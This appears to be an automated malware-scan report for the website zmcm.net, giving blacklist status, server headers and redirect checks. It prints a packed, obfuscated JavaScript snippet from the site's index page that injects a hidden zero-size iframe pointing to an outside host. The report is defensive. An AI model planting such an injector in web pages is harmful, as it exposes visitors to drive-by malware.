Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zmcm.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zmcm.net/ | HTTP/1.1 200 OK Date: Sun, 11 Jan 2015 09:11:02 GMT Accept-Ranges: bytes ETag: "99e21725792dd01:d6b" Server: WWW Server/1.1 Content-Length: 98139 Content-Location: http://zmcm.net/index.html Content-Type: text/html Last-Modified: Sun, 11 Jan 2015 08:32:33 GMT Set-Cookie: safedog-flow-item=551D98E43BD2798C9BBA62FFD57B02DF; expires=Wen, 17-Feb-2151 12:22:18 GMT; domain=zmcm.net; path=/ X-Died: timeout at scan.pm line 1566. X-Powered-By: WAF/2.0 X-Safe-Firewall: zhuji.360.cn 1.0.7.3 F1W1 | clean |
http://zmcm.net/index.html | 200 OK Content-Length: 98139 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5.6("<1 7=\\"2://3.4/b.c\\" a=\\"0\\" 8=\\"0\\" 9=\\"0\\"></1>");',13,13,'|iframe|http|winvvv|com|document|writeln|src|height|frameborder|width|cs|html'.split('|'),0,{})); Antivirus reports:
| ||
http://images.sohu.com/cs/jsfile/js/c.js | 200 OK Content-Length: 49320 Content-Type: application/x-javascript | clean |
http://images.sohu.com/cs/jsfile/js/l.js | 200 OK Content-Length: 48502 Content-Type: application/x-javascript | clean |
http://s1.kutongji.com/stat.php?
site=19599 | 200 OK Content-Length: 10 Content-Type: text/html | clean |
http://s1.kutongji.com/test404page.js | 404 Not Found Content-Length: 16 Content-Type: text/html | clean |
http://v3.jiathis.com/code/jia.js?uid=92559 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zmcm.net
Result:
HTTP/1.1 200 OK
Date: Sun, 11 Jan 2015 09:11:02 GMT
Accept-Ranges: bytes
ETag: "99e21725792dd01:d6b"
Server: WWW Server/1.1
Content-Length: 98139
Content-Location: http://zmcm.net/index.html
Content-Type: text/html
Last-Modified: Sun, 11 Jan 2015 08:32:33 GMT
Set-Cookie: safedog-flow-item=551D98E43BD2798C9BBA62FFD57B02DF; expires=Wen, 17-Feb-2151 12:22:18 GMT; domain=zmcm.net; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: WAF/2.0
X-Safe-Firewall: zhuji.360.cn 1.0.7.3 F1W1
...98139 bytes of data.
GET / HTTP/1.1
Host: zmcm.net
Result:
HTTP/1.1 200 OK
Date: Sun, 11 Jan 2015 09:11:02 GMT
Accept-Ranges: bytes
ETag: "99e21725792dd01:d6b"
Server: WWW Server/1.1
Content-Length: 98139
Content-Location: http://zmcm.net/index.html
Content-Type: text/html
Last-Modified: Sun, 11 Jan 2015 08:32:33 GMT
Set-Cookie: safedog-flow-item=551D98E43BD2798C9BBA62FFD57B02DF; expires=Wen, 17-Feb-2151 12:22:18 GMT; domain=zmcm.net; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: WAF/2.0
X-Safe-Firewall: zhuji.360.cn 1.0.7.3 F1W1
...98139 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zmcm.net
Referer: http://www.google.com/search?q=zmcm.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zmcm.net
Referer: http://www.google.com/search?q=zmcm.net
Result:
The result is similar to the first query. There are no suspicious redirects found.